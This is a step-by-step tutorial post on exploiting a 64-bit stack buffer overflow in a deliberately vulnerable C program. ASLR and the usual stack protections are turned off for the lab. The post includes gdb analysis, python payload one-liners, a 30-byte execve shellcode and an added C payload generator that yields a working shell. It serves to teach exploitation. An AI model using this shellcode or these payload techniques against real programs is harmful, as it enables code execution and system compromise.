Stack based Buffer Overflow - 64-bit: A step by step Guide

This step-by-step guide is inspired by the work of Mr. Un1k0d3r of the RingZer0 Team.

* Consider this post a tutorial of concrete steps; for more detail, read the reference section.

This post uses shell code as the payload of a stack-based buffer overflow to obtain a shell from a vulnerable 64-bit program.

Vulnerable Code (SH3.c)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv)
{
    char buffer[256];           /* fixed-size stack buffer */
    if (argc != 2)
    {
        exit(0);
    }
    printf("%p\n", buffer);     /* leak the buffer address to save time (see note below) */
    strcpy(buffer, argv[1]);    /* unbounded copy: argv[1] longer than 256 bytes overwrites the saved rbp and return address */
    printf("%s\n", buffer);
    return 0;
}        

Note: the buffer's address is printed to save time; it is the value we will later place in the return address slot.


  • Step 1: Ensure ASLR is disabled.

echo "0" > /proc/sys/kernel/randomize_va_space        

This must be done as root (the redirect is performed by your shell, so putting sudo in front of echo alone does not help), and the setting does not survive a reboot. With the value 0 the stack lands at the same address on every run, which is what lets a hard-coded return address work.

  • Step 2: Compile the code using gcc.

gcc SH3.c -o SH3 -fno-stack-protector -z execstack        

-fno-stack-protector removes the stack canary that would otherwise detect the overwritten return address, and -z execstack marks the stack executable so that shell code placed in the buffer can run. The binary is still position independent (gcc's default), which is why the code addresses below start with 0x5555...; with ASLR disabled they are stable too.

  • Step 3: Trigger the buffer overflow by running the program with an argument longer than the 256-byte buffer (e.g. 300 "A"s); it prints the buffer address, echoes the input and crashes with a segmentation fault.

  • Step 4: Load the binary into gdb for analysis.

  • Step 5: Trigger the same overflow inside gdb to see where it faults.

  • Step 6: Disassemble main (disas main) to locate the call to strcpy and the leave/ret epilogue.

  • Step 7: Set breakpoints for analysis; the second one goes on the ret at the end of main, after leave has executed, so that rsp points at the saved return address.

  • Step 8: Check the registers (look at rbp, rsp and rip).

  • Step 9: Trigger the overflow again and stop at breakpoint 2.

run $(python -c 'print "A" *300')        

The python one-liners in this post use Python 2 syntax; with Python 3, print is a function and would also UTF-8-encode the non-ASCII address bytes used later, so use Python 2 for them as written.

  • Step 10: Check the registers (rsp, rbp, rip).

Keep track of the base pointer (rbp), the stack pointer (rsp) and the instruction pointer (rip) as main runs.

The base pointer points to 0x7fffffffdf10.

  • Step 11: Check the rsp status.

Current status: rbp is 0x7fffffffdf30, rsp is 0x7fffffffde10 (the start of buffer, the same address the program printed).

  • Step 12: Check the status at breakpoint 2.

Check the updated rbp, rsp (0x7fffffffdf18) and rip (0x555555555228): after leave, rsp points at the saved return address and rip is at main's ret.

Once the ret executes with the overwritten return address, the program ends in a segmentation fault caused by the overflow.

The next step is to take control of the rip register (currently 0x555555555228) and point it at an address of our choosing.

  • Step 13: Control the rip register.

The distance from the start of the buffer (0x7fffffffde10) to the saved return address (rsp after the leave instruction, 0x7fffffffdf18) is 0x108 = 264 bytes: the 256-byte buffer declared in the code plus the 8-byte saved rbp that sits between the buffer and the return address.

This gives the new overflow payload:

$(python -c 'print "A"*264 + "B"*6')        

Here the return address is overwritten with "BBBBBB" ("\x42\x42\x42\x42\x42\x42"). Only six bytes are written because user-space addresses on x86-64 are 48 bits wide: strcpy appends a NUL as the seventh byte, and the eighth byte keeps the 0x00 that the original return address (0x0000555555555228) already had, so the full 8-byte slot reads 0x0000424242424242.

  • Step 14: Use the new payload.

At breakpoint 1 the buffer is filled with our "A"s; at breakpoint 2, on the ret, the top of the stack (the saved return address) reads 0x0000424242424242.

Stepping over the ret (the next instruction) pops that value into rip, and the register dump shows rip = 0x424242424242: the fault now happens at an address we chose, so we control the return address.

  • Step 15: Final attack

Let us reconfirm the buffer address printed by the program (0x7fffffffde30). It differs from the 0x7fffffffde10 seen earlier because argv[1] itself lives higher on the stack, so a payload of a different length (270 bytes instead of 300) shifts the whole frame; always use the address printed by the run you are attacking.

Use this address as the new return address in the payload:

$(python -c 'print "A"*264 + "\x30\xde\xff\xff\xff\x7f"')        

Note: the address bytes are written least-significant byte first because x86-64 is little-endian, so 0x7fffffffde30 becomes "\x30\xde\xff\xff\xff\x7f" in the payload.

The output confirms that rip now holds our address, and the register dump shows the same.

  • Step 16: Time to run the shell code.

Working 64-bit shell code (30 bytes): it pushes the string "/bin//sh" onto the stack and invokes execve (syscall 59) with rdi pointing at the string, rsi at an argv of {path, NULL} and rdx = NULL. It contains no NUL bytes, which matters because strcpy would stop copying at the first one.

"\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e"
"\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57"
"\x48\x89\xe6\x48\x31\xc0\xb0\x3b\x0f\x05"        

Our padding was 264 bytes. The shell code goes at the very start of the buffer, so the filler shrinks to 264 - 30 = 234 "A"s, and the return address 0x7fffffffde30 (the buffer start) points straight at the shell code. Because the return address must hit the first shell code byte exactly, a shift of even a few bytes breaks the attack; that is why the program prints the buffer address.

The new payload becomes:

run $(python -c 'print "\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x48\x31\xc0\xb0\x3b\x0f\x05" + "A"*234 + "\x30\xde\xff\xff\xff\x7f"')        

Access to shell: if the steps are followed properly, the ret lands in the shell code and we get a shell.

  • Step 17: Attack outside gdb

Outside the debugger the environment differs (gdb adds environment variables such as LINES and COLUMNS and runs the binary by its full path), so the stack is laid out slightly differently and the buffer lands at another address. The printed buffer address helps here: observe that it has changed from 0x7fffffffde30 to 0x7fffffffde70.

All we have to do is change the return address in the payload to 0x7fffffffde70 (i.e. "\x70\xde\xff\xff\xff\x7f") and the buffer overflow attack works from a normal shell.
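As an added example (not part of the original post and not the author's code), here is the payload of Steps 13 to 17 built in C instead of a Python one-liner, with the checks the attack silently relies on: strcpy stops at the first NUL byte, so neither the shell code nor the filler may contain one; only the low six bytes of the return address are written, because the seventh byte is strcpy's terminator and the eighth is the 0x00 high byte the PIE return address already had; and the address bytes go out least-significant byte first. The padding of 264 bytes and the default return address 0x7fffffffde30 are the values observed in the post's gdb session and are assumptions for any other machine (pass the address SH3 prints as the first argument); the program name mkpayload is hypothetical.

```c
/* mkpayload.c: added example, not from the original post.
 * Builds the Step 16 payload the way the Python one-liner does and checks the
 * properties the attack depends on.  The offset 264 and the default return
 * address 0x7fffffffde30 are the values seen in the post's gdb session; on
 * another machine pass the address that SH3 prints (assumption).
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The post's 30-byte execve("/bin//sh") shell code, instruction by instruction. */
static const unsigned char shellcode[] =
    "\x48\x31\xd2"                              /* xor  rdx, rdx   ; envp = NULL            */
    "\x52"                                      /* push rdx        ; NUL that ends the path */
    "\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68"  /* mov  rax, "/bin//sh" (8 bytes, no NUL)   */
    "\x50"                                      /* push rax        ; path now on the stack  */
    "\x48\x89\xe7"                              /* mov  rdi, rsp   ; rdi = pathname         */
    "\x52"                                      /* push rdx        ; argv[1] = NULL         */
    "\x57"                                      /* push rdi        ; argv[0] = pathname     */
    "\x48\x89\xe6"                              /* mov  rsi, rsp   ; rsi = argv             */
    "\x48\x31\xc0"                              /* xor  rax, rax                            */
    "\xb0\x3b"                                  /* mov  al, 59     ; SYS_execve             */
    "\x0f\x05";                                 /* syscall                                  */
/* sizeof counts the literal's own terminating NUL, which is not part of the shell code. */
#define SHELLCODE_LEN (sizeof(shellcode) - 1)
#define RET_BYTES 6   /* only the low 6 bytes of a canonical user-space address are written */

/* Step 13's arithmetic: rsp after `leave` points at the saved return address,
 * so its distance from the buffer start is the padding length (0x108 = 264). */
size_t ret_offset(uintptr_t buf_addr, uintptr_t rsp_after_leave)
{
    return (size_t)(rsp_after_leave - buf_addr);
}

/* strcpy() stops at the first NUL byte: anything after it never reaches the stack. */
int has_nul(const unsigned char *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0)
            return 1;
    return 0;
}

/* Layout: [shell code][filler 'A' up to offset][low 6 bytes of ret_addr, little-endian].
 * Returns the payload length, or 0 when the layout cannot work. */
size_t build_payload(unsigned char *out, size_t out_cap, size_t offset, uint64_t ret_addr)
{
    if (SHELLCODE_LEN > offset || offset + RET_BYTES > out_cap)
        return 0;                      /* shell code would not fit before the return address */
    if (has_nul(shellcode, SHELLCODE_LEN))
        return 0;                      /* strcpy would truncate the payload */
    if (ret_addr >> (8 * RET_BYTES))
        return 0;                      /* bytes 7 and 8 must be 0x00: strcpy's NUL and the old high byte */
    memcpy(out, shellcode, SHELLCODE_LEN);
    memset(out + SHELLCODE_LEN, 'A', offset - SHELLCODE_LEN);   /* 264 - 30 = 234 filler bytes */
    for (size_t i = 0; i < RET_BYTES; i++)   /* least-significant byte first: x86-64 is little-endian */
        out[offset + i] = (unsigned char)(ret_addr >> (8 * i));
    return offset + RET_BYTES;
}

int main(int argc, char **argv)
{
    /* The address SH3 printed in the run being attacked (Steps 15/17); default is the in-gdb value. */
    uint64_t ret_addr = argc > 1 ? strtoull(argv[1], NULL, 0) : 0x7fffffffde30ULL;
    unsigned char payload[512];
    size_t len = build_payload(payload, sizeof payload, 264, ret_addr);
    if (len == 0) {
        fprintf(stderr, "payload layout cannot work\n");
        return 1;
    }
    fwrite(payload, 1, len, stdout);   /* usage: ./SH3 "$(./mkpayload 0x7fffffffde70)" */
    return 0;
}
```

The payload is written to stdout so it can be passed through command substitution exactly like the Python version; none of its bytes is a newline, so the shell does not strip anything. The canonical-address check is what makes the six-byte write safe: an address with a non-zero top 16 bits could never be produced this way, and jumping to a non-canonical address would fault before the shell code is ever reached.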


Reference:

Dr. Aditya Raj

Assistant Director(IT)/Scientist-B at National Informatics Centre, Ministry of Electronics and Information Technology, Government of India

7 months

Great initiative Dr saheb.

Dr. Keshav Sinha

RANDOMNESS | SECURITY | ALGORITHM

7 months

It's very resourceful.
